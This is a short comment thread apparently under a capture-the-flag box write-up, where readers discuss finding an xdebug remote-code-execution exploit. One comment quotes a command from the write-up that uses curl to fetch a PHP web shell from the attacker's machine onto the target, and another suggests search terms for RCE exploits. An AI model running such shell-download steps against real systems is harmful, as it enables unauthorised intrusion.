• Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!

    Lesson learned, thanks.

  • edited October 2018

    Thank you very much for your writeups.

    May I ask you 2 questions:

    Question 1:

    I wonder what keywords in Google you used to find this link:

    I tried these keywords in Google without success.
    xdebug exploit
    xdebug exploit shell
    xdebug exploit rce
    xdebug exploit repository
    xdebug vulnerabilities
    xdebug php exploit

    Question 2 has 2 sub-questions:

    You wrote in your writeup:

    ./ -u

    We upload a shell; from the obtained shell:

    curl -O http://miIp/shell.php

    Is this "" the code copied from

    I guess
    the IP address of my Kali Linux?

    Please advise.

    Thanks a million.

  • I guess the keywords to search on Google were:

    php debug rce
